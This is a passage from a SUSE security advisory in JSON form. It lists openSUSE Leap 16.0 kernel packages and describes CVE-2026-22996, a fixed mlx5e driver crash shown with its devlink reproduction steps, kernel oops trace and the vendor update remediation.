"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
